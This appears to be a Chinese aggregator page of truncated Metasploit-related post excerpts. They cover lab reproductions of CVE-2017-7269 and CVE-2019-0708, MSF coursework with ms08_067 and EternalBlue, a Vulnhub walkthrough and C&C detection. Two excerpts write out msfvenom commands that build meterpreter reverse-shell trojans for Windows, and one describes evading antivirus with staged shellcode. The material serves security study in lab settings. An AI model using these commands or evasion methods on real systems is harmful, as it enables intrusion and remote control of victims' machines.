metasploit

Kali安装备忘

孤人 提交于 2020-12-25 20:06:18
Kali版本 对CTF来说,Kali的直接Root用户登陆肯定是最方便的。2020版本安装时还要设置一个普通用户名,背叛了Geek的精神!而且2020没有Light版本,只能网络安装或下载全版本的ISO文件,简直多余,因此最优是2019.4的light 虚拟机 VMware至少要用15版本的,不然在高分屏下的显示非常小。15可以进行屏幕拉伸,Kali安装完成后,还可以在setting-display等地方设置分辨率、缩放因子等。最为方便的是安装VMware tools后,可以双向复制粘贴、目录共享。 Visualbox使用起来不太方便,只能“分离启动”就不提了,关键是安装增强工具后,也不能完成目录共享,折腾了很久的 mount -t vboxfs ...... ,最后放弃。 软件安装 安装后要把系统源、PIP改到阿里云,然后apt update,随后还要安装 aptitude,在apt下无法安装的gcc等可以通过aptitude完成。根据pwn的需要主要安装的工具有upx、gdb(及peda插件)、pip、fcrackzip、java、netcore、php、uncompyle6等。据说edb是linux下不错的调试器,以后再试。 相当长时间内不要考虑的是pwn相关的内容,如:pwntools、Metasploit。 相反逆向移动开发相关的内容可以后续跟进。 来源: oschina

IIS 6.0 远程代码执行漏洞复现(cve-2017-7269)

丶灬走出姿态 提交于 2020-12-23 03:10:50
IIS 6.0 远程代码执行漏洞复现(cve-2017-7269) 靶机(server2003)上的配置: 点击添加/删除windows组件 找到应用程序服务器,点开 选中IIS信息服务器 确定,然后就安装了 安装完成之后 在管理工具里面就有IIS管理器了,打开 在这里插入图片描述 开启WebDAV WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。 攻击主机(kali): 开启msf数据库 删除数据库 初始化数据库 开启数据库 设为开机自启动 启用msf Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 把cve_2017_7269.rb复制到相应的目录下(Exploits模块,就是针对不同的已知漏洞的利用程序。)

2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

戏子无情 提交于 2020-12-19 09:51:27
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功) ms17_010_eternalblue:“永恒之蓝”自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功) windows/x64/vncinject/reverse_tcp_uuid(成功且唯一) 攻击浏览器的实践 ms14_064 payload:windows/meterpreter/reverse_tcp(成功) payload:windows/meterpreter/reverse_https(失败) 攻击客户端的实践 Adobe payload:windows/meterpreter/bind_tcp(成功) 成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口(在ms08_067_netapi:自动化漏洞溢出攻击中有体现) 离实战还缺些什么技术或步骤 实验总结与体会 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式

Sumap网络测绘探测C&C远控在野情况分析

浪子不回头ぞ 提交于 2020-12-19 08:41:58
0x00 网络测绘角度下的C&C威胁分析 ​ 在日渐激烈的网络对抗中,伴随***手段的更新换代,远控为了满足需求随之发展,种类繁多,常见的远控有:Cobalt Strike、Metasploit Framework、Empire、PoshC2、Pupy等。 ​ 在常见的远控中,Cobalt Strike是熟知的***测试利器,功能十分强大,可扩展性强,从前期载荷生成、诱饵捆绑、钓鱼***到载荷植入目标成功后的持续控制、后***阶段都可以很好支持,几乎覆盖***链的各个阶段。并且支持多种上线方式,以及多种丰富的配置可以达到非常好的隐蔽效果。CS teamserver团队服务器又可以使众多CS客户端连上它,以进行团队协作。Metasploit Framework能够提供众多漏洞利用,这两款远控功能强大且容易上手,因此也是广大redteamer的必备武器。 ​ C&C作为全球范围红队的基础设施,长期部署在世界各个角落,如何通过探测C&C服务器成为了一个问题。传统的流量规则只能对小范围的C2设施进行识别,有一定的局限性。对于全网的资产识别,通过网络测绘来进行扫描识别C2会不会更全面呢? 0x01 网络空间测绘 ​ 互联网在高速发展的今天,传统的网络安全大多面向局部安全未曾考虑整体全网环境下的网络安全,这样也造成了近年来***者频繁面向全网展开***

Vulnhub-靶机-IMF: 1

北城余情 提交于 2020-12-12 10:02:18
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现 地址:https://www.vulnhub.com/entry/imf-1,162/ nmap -p- -n -sC -sV 192.168.5.145 -o imf.nmap 目录猜解没有猜解出来,看看目标web 有3个选项卡,分别点击3个选项卡网页上发现什么敏感内容,尝试看每个网页的源代码,发现contact.php的源码页面看到第一个flag flag1{YWxsdGhlZmlsZXM=} YWxsdGhlZmlsZXM= 根据特征可以猜测是base64进行编码的,这里进行解码看看 解码后的信息如下: allthefiles 通过搜索页面的等号发现另一个base64编码的信息 解码后结果 yYXRvcg==} 发现解码出来的信息还是类似base64编码,感觉问题很大,不像是base64编码,然后想了想

2018-2019-2 20165215《网络对抗技术》Exp5 MSF基础应用

你离开我真会死。 提交于 2020-12-07 10:06:18
[TOC] 实验内容 一个主动攻击实践,如ms08_067; 一个针对浏览器的攻击,如ms11_050; 一个针对客户端的攻击,如Adobe; 成功应用任何一个辅助模块。 实验原理 MSF主要模块: 渗透攻击模块 (Exploit Modules)、 辅助模块 (Auxiliary Modules)、 攻击载荷 (Payload Modules)、 空字段模块 (Nop Modules)、 编码模块 (Encoders)、 后渗透攻击模块 (Post) 查看模块源码的目录: /usr/share/metasploit-framework/modules 本次实验使用的是 Exploit Modules 和 Auxiliary Modules Exploit Modules :指利用某种漏洞对目标主机进行攻击。渗透就是说攻击者通过目标主机上的一个漏洞将自己的恶意代码注入目标主机的系统,就像白蚁一样,从一个洞慢慢攻破整栋建筑。 Auxiliary Modules :帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。它和渗透攻击模块之间的关系就好像观察者和狙击手的关系,前者负责观察网络环境,得到准确的信息;后者就根据收集到的信息进行攻击。 实验步骤 (一)一个主动攻击实践 ms08_067(成功) 原理

9.20 kali中的Metasploit生成木马控制windows 以及http协议相关

只愿长相守 提交于 2020-12-05 22:09:35
使用 kali 中的 Metasploit 生成木马控制 windows 系统 Kali 基于 BT5 R3 ,其中 Metasploit 是一个综合利用工具,能极大地提高攻击者的渗透效率,进入该工具的方式: msfconsole , MSF 依赖 Postgresql 数据库,使用前需要开启该数据库。 Step1 :生成木马, msfvenom Msfvenom -p windows/meterpreter/reverse_tcp lhost=kali 的 ip lport=5555 -f exe >/root/Desktop/evilshell.exe -p 参数后跟上 payload ,攻击成功之后要做什么事 lhost 后面跟监听的 ip lhost 后面跟监听的端口 -f 后面跟要生成后门文件 Step2 :将木马文件 evilshell.exe 拷贝到 /var/www/html 文件夹下,开启 apache 在肉鸡上打开浏览器,访问该站点 =kali 的 ip ,将木马文件下载都肉鸡上 Step3 :开启 MSF Msfconsole (提前查看 postgresql 状态) =[ metasploit v5.0.41-dev ] + -- --=[ 1914 exploits - 1074 auxiliary - 330 post ] + -- --=[ 556

20155201 网络攻防技术 实验五 MSF基础应用

徘徊边缘 提交于 2020-12-05 06:43:29
20155201 网络攻防技术 实验五 MSF基础应用 一、实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一个辅助模块 二、报告内容: 1. 基础问题回答 1)用自己的话解释什么是exploit,payload,encode. exploit:把负责攻击靶机的代码或者程序传送到靶机上 payload:载荷,exploit传送的内容 encode:编码方式,可以修改载荷的编码方式让载荷不容易被发现。 2)离实战还缺什么步骤 那个adobe的实践令我眼前一亮,不过其实首先要先与被攻击的电脑在同一网段,其次需要他的操作系统和reader等级都不高,还没打过补丁,这在现实中不太可能存在。。想要成为高手还是得自己找软件的漏洞,还是需要学习。。 2. 实践总结与体会 本次实验的重点在于实践,对于辅助模块的了解、查看文档、说明和使用,通过对msfconsolo命令的操作和使用,对其更加了解和熟练。 3. 实践过程记录 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一个辅助模块 <a name="RW1"></a> 一个主动攻击实践,如ms08_067 在kali终端中

动态加载 ShellCode绕过杀软

流过昼夜 提交于 2020-11-24 05:55:14
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。 虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。通过使用virscan云鉴定技术,可以衡量出Payload的是否免杀,但需要注意的是,只有动态检测或基于行为的检测,才能真正捕获到现实世界中的Payload。 首先我们使用 msfvenom 命令创建一个具有反向连接Shell的可执行文件,生成命令(Linux)如下: [root@localhost ~]# msfvenom –p windows/meterpreter/reverse_tcp \ > lhost=192.168.1.30 lport=8888 \ > -f exe -o lyshark.exe 上方的代码就可以生成一个lyshark.exe的可执行文件,将此文件上传到VirusTotal,发现它会被大量反病毒引擎所查杀,这是正常的,因为它是一个常见的Payload

CVE-2019-0708漏洞复现

守給你的承諾、 提交于 2020-11-09 20:30:14
windows RDP远程代码执行_CVE-2019-0708漏洞复现 一、漏洞概述 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。 二、漏洞影响版本 Windows 7 Windows server 2008 R2 Windows server 2008 Windows 2003 Windows xp 注:Windows 8和windows10以及之后的版本不受此漏洞影响 三、漏洞环境搭建 目标机:windows xp IP:192.168.45.135 攻击机:kali系统、\win7(安装python3环境,安装impacket模块) 条件:目标机开启3389端口,关闭防火墙 四、漏洞复现 1、 目标3389端口,关闭防火墙(或者在防火墙策略中放行3389端口) 2、 使用msf中相应的模块验证是否存在漏洞 2.1、升级msf版本 apt-get update apt-get install metasploit-framework 注意:不升级msf,使用msf v4版本加载第三方脚本,会报错,可能只因为cve-2019